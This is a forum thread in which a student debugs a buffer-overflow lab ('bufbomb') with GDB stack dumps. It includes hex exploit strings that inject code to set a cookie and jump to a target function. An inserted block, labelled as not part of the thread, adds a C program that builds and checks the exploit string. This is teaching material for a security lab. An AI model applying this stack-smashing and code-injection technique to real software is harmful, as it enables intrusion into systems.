0x08048e55 <Gets+133>:  mov    %al,(%esi)
0x08048e57 <Gets+135>:  movsbl %al,%eax
0x08048e5a <Gets+138>:  add    $0x1,%esi
0x08048e5d <Gets+141>:  call   0x80488d0 <save_char>
0x08048e62 <Gets+146>:  mov    0x804a1a0,%eax
0x08048e67 <Gets+151>:  mov    %eax,(%esp)
0x08048e6a <Gets+154>:  call   0x80486b4 <_IO_getc@plt>
0x08048e6f <Gets+159>:  cmp    $0xffffffff,%eax
0x08048e72 <Gets+162>:  jne    0x8048e50 <Gets+128>
0x08048e74 <Gets+164>:  movb   $0x0,(%esi)
0x08048e77 <Gets+167>:  mov    0x804a1c4,%eax
0x08048e7c <Gets+172>:  movb   $0x0,0x804a1e0(%eax,%eax,2)
0x08048e84 <Gets+180>:  mov    0x8(%ebp),%eax
0x08048e87 <Gets+183>:  add    $0xc,%esp
0x08048e8a <Gets+186>:  pop    %ebx
0x08048e8b <Gets+187>:  pop    %esi
0x08048e8c <Gets+188>:  pop    %edi
0x08048e8d <Gets+189>:  pop    %ebp
0x08048e8e <Gets+190>:  ret    
0x08048e8f <Gets+191>:  nop    
---Type <return> to continue, or q <return> to quit---
0x08048e90 <Gets+192>:  mov    0xfffffff0(%ebp),%eax
0x08048e93 <Gets+195>:  mov    $0x1,%edi
0x08048e98 <Gets+200>:  shl    $0x4,%eax
0x08048e9b <Gets+203>:  lea    (%edx,%eax,1),%eax
0x08048e9e <Gets+206>:  mov    %al,(%esi)
0x08048ea0 <Gets+208>:  movsbl %al,%eax
0x08048ea3 <Gets+211>:  add    $0x1,%esi
0x08048ea6 <Gets+214>:  call   0x80488d0 <save_char>
0x08048eab <Gets+219>:  jmp    0x8048e00 <Gets+48>
End of assembler dump. 
Dump of assembler code for function getbuf:
0x08048f40 <getbuf+0>:  push   %ebp
0x08048f41 <getbuf+1>:  mov    %esp,%ebp
0x08048f43 <getbuf+3>:  sub    $0x18,%esp
0x08048f46 <getbuf+6>:  lea    0xfffffff4(%ebp),%eax
0x08048f49 <getbuf+9>:  mov    %eax,(%esp)
0x08048f4c <getbuf+12>: call   0x8048dd0 <Gets>
0x08048f51 <getbuf+17>: mov    $0x1,%eax
0x08048f56 <getbuf+22>: leave  
0x08048f57 <getbuf+23>: ret    
0x08048f58 <getbuf+24>: nop    
0x08048f59 <getbuf+25>: lea    0x0(%esi),%esi
End of assembler dump.

by: purewin | Posted on 2009-11-05 at 20:55:53 | ID: 25756697

So can you confirm that it is indeed my code not falling together correctly?

(gdb) break *0x08048f4c
Breakpoint 1 at 0x8048f4c
(gdb) break *0x08048f57
Breakpoint 2 at 0x8048f57
(gdb) run -t jalexanb < exploit-raw.txt
Starting program: /home/jalexanb/lab2/bufbomb -t jalexanb < exploit-raw.txt
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
Team: jalexanb
Cookie: 0x5d5f53de 
Breakpoint 1, 0x08048f4c in getbuf ()
(gdb) x/32xw $sp
0xbfffb3f0:     0xbfffb3fc      0x00000000      0x0804a108      0xbfffb434
0xbfffb400:     0x00857ff4      0x00000003      0xbfffb428      0x08048f7e
0xbfffb410:     0x00000003      0x008584c0      0x08049983      0xbfffb434
0xbfffb420:     0xbfffb434      0xdeadbeef      0xbfffe9f8      0x08049056
0xbfffb430:     0x08049983      0x000000f4      0x00003560      0x00000000
0xbfffb440:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb450:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb460:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) si
0x08048dd0 in Gets ()
(gdb) si
0x08048dd1 in Gets ()
(gdb) x/32xw $sp
0xbfffb3e8:     0xbfffb408      0x08048f51      0xbfffb3fc      0x00000000
0xbfffb3f8:     0x0804a108      0xbfffb434      0x00857ff4      0x00000003
0xbfffb408:     0xbfffb428      0x08048f7e      0x00000003      0x008584c0
0xbfffb418:     0x08049983      0xbfffb434      0xbfffb434      0xdeadbeef
0xbfffb428:     0xbfffe9f8      0x08049056      0x08049983      0x000000f4
0xbfffb438:     0x00003560      0x00000000      0xf4f4f4f4      0xf4f4f4f4
0xbfffb448:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb458:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) si
0x08048dd3 in Gets ()
(gdb) x/32xw $sp
0xbfffb3e8:     0xbfffb408      0x08048f51      0xbfffb3fc      0x00000000
0xbfffb3f8:     0x0804a108      0xbfffb434      0x00857ff4      0x00000003
0xbfffb408:     0xbfffb428      0x08048f7e      0x00000003      0x008584c0
0xbfffb418:     0x08049983      0xbfffb434      0xbfffb434      0xdeadbeef
0xbfffb428:     0xbfffe9f8      0x08049056      0x08049983      0x000000f4
0xbfffb438:     0x00003560      0x00000000      0xf4f4f4f4      0xf4f4f4f4
0xbfffb448:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb458:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) c
Continuing. 
Breakpoint 2, 0x08048f57 in getbuf ()
(gdb) x/32xw $sp
0xbfffb40c:     0xbfffb40c      0xa1c005c7      0x53de0804      0xd0685d5f
0xbfffb41c:     0xc308048c      0xbfffb3fc      0xdeadbe00      0xbfffe9f8
0xbfffb42c:     0x08049056      0x08049983      0x000000f4      0x00003560
0xbfffb43c:     0x00000000      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb44c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb45c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb46c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb47c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) si
0xbfffb40c in ?? ()
(gdb) x/x 0xbfffb408
0xbfffb408:     0xbfffb428
(gdb) x/32xw 0xbfffb408
0xbfffb408:     0xbfffb428      0xbfffb40c      0xa1c005c7      0x53de0804
0xbfffb418:     0xd0685d5f      0xc308048c      0xbfffb3fc      0xdeadbe00
0xbfffb428:     0xbfffe9f8      0x08049056      0x08049983      0x000000f4
0xbfffb438:     0x00003560      0x00000000      0xf4f4f4f4      0xf4f4f4f4
0xbfffb448:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb458:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb468:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb478:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) x/32xw 0xbfffb3fc
0xbfffb3fc:     0xbfffb434      0x00857ff4      0x00000003      0xbfffb428
0xbfffb40c:     0xbfffb40c      0xa1c005c7      0x53de0804      0xd0685d5f
0xbfffb41c:     0xc308048c      0xbfffb3fc      0xdeadbe00      0xbfffe9f8
0xbfffb42c:     0x08049056      0x08049983      0x000000f4      0x00003560
0xbfffb43c:     0x00000000      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb44c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb45c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb46c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) 

by: Infinity08 | Posted on 2009-11-06 at 08:06:46 | ID: 25760321

>> (gdb) si
>> 0xbfffb40c in ?? ()

The overwritten return address needs to point to the start of your exploit code, not to itself.
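As an added example (not part of the thread, and not Infinity08's or purewin's code), here is the layout the answer above describes, built in C from the values visible in the GDB session: buf starts at 0xbfffb3fc, getbuf's return address sits 16 bytes in at 0xbfffb40c, and the posted bytes encode global_value at 0x0804a1c0, bang at 0x08048cd0 and the cookie 0x5d5f53de. The generator writes the movl/push/ret sequence directly after the return-address slot and points the slot at it, then decodes the slot to confirm that ret lands on the first opcode; passing the slot's own address (0xbfffb40c, as in the first attempt above) makes that check fail. Fixed stack addresses and an executable stack are assumptions that hold for this lab binary only; under ASLR and NX the same bytes would not run.

```c
/*
 * Added example (not code from the thread): lay out a Level 2 exploit string
 * in the hex text form that this bufbomb's Gets() decodes, and check that the
 * overwritten return address lands on the injected code rather than on itself.
 * Assumes fixed stack addresses and an executable stack (true for the lab
 * binary, not for a modern system with ASLR and NX).
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_ADDR     0xbfffb3fcu  /* pointer getbuf() passes to Gets(): start of buf   */
#define RET_SLOT_OFF 16u          /* buf start -> getbuf()'s return address (ebp+4)     */
#define GLOBAL_ADDR  0x0804a1c0u  /* &global_value, as encoded in "c7 05 c0 a1 04 08"  */
#define BANG_ADDR    0x08048cd0u  /* &bang, as encoded in "68 d0 8c 04 08"             */
#define COOKIE       0x5d5f53deu  /* team cookie printed by bufbomb                    */
#define CODE_LEN     16u          /* movl (10 bytes) + push (5) + ret (1)              */

static void put32(uint8_t *p, uint32_t v)        /* little-endian store */
{
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

static uint32_t get32(const uint8_t *p)          /* little-endian load */
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Where the injected code will sit: immediately after the return-address slot. */
uint32_t code_addr(void) { return BUF_ADDR + RET_SLOT_OFF + 4; }

/*
 * Layout: [padding][ret_value][movl $COOKIE,GLOBAL_ADDR][push $BANG_ADDR][ret]
 * ret_value is a parameter so the thread's mistake (slot pointing at itself)
 * can be reproduced next to the correct value.  Returns bytes written, 0 if
 * the output buffer is too small.
 */
size_t build_exploit(uint8_t *out, size_t cap, uint32_t ret_value)
{
    size_t n = 0;
    if (cap < RET_SLOT_OFF + 4 + CODE_LEN) return 0;
    memset(out, 0x90, RET_SLOT_OFF);       /* padding: never executes, any value works */
    n += RET_SLOT_OFF;
    put32(out + n, ret_value); n += 4;     /* overwrites getbuf()'s saved return address */
    out[n++] = 0xc7; out[n++] = 0x05;      /* C7 /0, ModRM 05: movl $imm32, disp32 */
    put32(out + n, GLOBAL_ADDR); n += 4;
    put32(out + n, COOKIE); n += 4;
    out[n++] = 0x68;                       /* push $imm32 (address of bang) */
    put32(out + n, BANG_ADDR); n += 4;
    out[n++] = 0xc3;                       /* ret: pops &bang into %eip */
    return n;
}

/* Value getbuf()'s ret instruction will load into %eip. */
uint32_t ret_target(const uint8_t *s) { return get32(s + RET_SLOT_OFF); }

/* 1 if that target is inside the string and on the movl opcode, else 0. */
int ret_lands_on_code(const uint8_t *s, size_t n)
{
    uint32_t t = ret_target(s);
    if (t < BUF_ADDR || t + 1 >= BUF_ADDR + n) return 0;
    return s[t - BUF_ADDR] == 0xc7 && s[t - BUF_ADDR + 1] == 0x05;
}

int main(void)
{
    uint8_t s[64];
    size_t n = build_exploit(s, sizeof s, code_addr());
    for (size_t i = 0; i < n; i++)                      /* hex text, as Gets() expects */
        printf("%02x%c", s[i], i + 1 < n ? ' ' : '\n');
    printf("ret -> 0x%08x, lands on code: %d\n", ret_target(s), ret_lands_on_code(s, n));
    return 0;
}
```

Feed the printed hex text to the lab binary as the thread does (`bufbomb -t <team> < file`). Because the movl/push/ret sequence is exactly 16 bytes, it would also fit in the padding area with the slot set to 0xbfffb3fc instead; either way the slot must hold the address of the code's first byte, not the address of the slot.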

 

by: purewin | Posted on 2009-11-06 at 12:43:20 | ID: 25762864

So it needs to point to this address then?
0xbfffb3fc

 

by: purewin | Posted on 2009-11-06 at 15:31:14 | ID: 25764007

0xbfffb3fc looks to be the right address... but it doesn't work. Or do I need to find the value at that address and use that?

Breakpoint 2, 0x08048dd0 in Gets ()
(gdb) si
0x08048dd1 in Gets ()
(gdb) si
0x08048dd3 in Gets ()
(gdb) x/x ($ebp+8)
0xbfffb3f0:     0xbfffb3fc
(gdb) x/x $ebp
0xbfffb3e8:     0xbfffb408
(gdb) x/32w ($ebp+8)
0xbfffb3f0:     0xbfffb3fc      0x00000000      0x0804a108      0xbfffb434
0xbfffb400:     0x00857ff4      0x00000003      0xbfffb428      0x08048f7e
0xbfffb410:     0x00000003      0x008584c0      0x08049983      0xbfffb434
0xbfffb420:     0xbfffb434      0xdeadbeef      0xbfffe9f8      0x08049056
0xbfffb430:     0x08049983      0x000000f4      0x00003560      0x00000000
0xbfffb440:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb450:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb460:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) x/32w ebp
No symbol table is loaded.  Use the "file" command.
(gdb) x/32w $ebp
0xbfffb3e8:     0xbfffb408      0x08048f51      0xbfffb3fc      0x00000000
0xbfffb3f8:     0x0804a108      0xbfffb434      0x00857ff4      0x00000003
0xbfffb408:     0xbfffb428      0x08048f7e      0x00000003      0x008584c0
0xbfffb418:     0x08049983      0xbfffb434      0xbfffb434      0xdeadbeef
0xbfffb428:     0xbfffe9f8      0x08049056      0x08049983      0x000000f4
0xbfffb438:     0x00003560      0x00000000      0xf4f4f4f4      0xf4f4f4f4
0xbfffb448:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb458:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb)

 

by: purewin | Posted on 2009-11-07 at 13:11:28 | ID: 25768066

I just can't figure out what I'm doing wrong... this is so aggravating.

 

by: purewin | Posted on 2009-11-07 at 13:44:28 | ID: 25768194

The address I need to get my code called is stored at ebp+8 correct?

 

by: purewin | Posted on 2009-11-07 at 14:13:19 | ID: 25768293

Do I need to set my exploit code up like this?
(padding)(return to bang)(set global variable)(return to my code)

Return to bang would overwrite the ret address in getbuf, and then the return address for my code would be found at ebp+8 in Gets?

 

by: purewin | Posted on 2009-11-07 at 20:58:04 | ID: 25769447

Okay, well, I'm close now. I'm getting a misfire. I know that 0x08048a1c0 is the right address I need to store my cookie in, so I'm not sure why this won't work.

fc b3 ff bf f4 7f 85 00 03 00 00 00 28 b4 ff bf d0 8c 04 08 c7 05 c0 a1 04 08 de 53 5f 5d 68 d0 8c 04 08 c3

 

by: purewin | Posted on 2009-11-08 at 01:40:37 | ID: 25769947

Okay, well, I did the above string wrong and it's not going to work, so scratch that; I figured it out. Thanks a lot for the help you gave... you really are good with this stuff, and I really appreciate the help. Are there any online resources you could recommend for assembly and these sorts of concepts? Also, I'm sure I'll be posting some questions on the last phase if you would like to offer insight. Again, thanks for the help!

 

by: Infinity08 | Posted on 2009-11-08 at 02:49:05 | ID: 25770089

No problem. I'm not always available all the time, but when I am, I'm glad to be of assistance :)

Online resources for assembly? Experience mainly comes with practice (after doing all these phases, for example, I'm sure you have a much better understanding of how the stack works, heh). But you could have a look at "The Art of Assembly Language Programming":

        http://homepage.mac.com/randyhyde/webster.cs.ucr.edu/www.artofasm.com/index.html

which gives a good introduction into practical assembly programming.

 

by: purewin | Posted on 2009-11-08 at 02:57:12 | ID: 25770101

I completed the last phase! Man, I love this stuff! Sucks, though, that I never learn anything from class... always end up teaching myself. lol. I may attempt the extra phase sometime later today, but I have more work to do before that. Again, Infinity, thanks for all your help!

 

by: Infinity08 | Posted on 2009-11-08 at 03:09:10 | ID: 25770120

>> always end up teaching myself. lol.

That's not necessarily bad. What you learn for yourself is not easily forgotten :)

 

by: purewin | Posted on 2009-11-08 at 03:44:09 | ID: 25770177

True. It just sucks that I pay all this money and end up learning on my own. :(
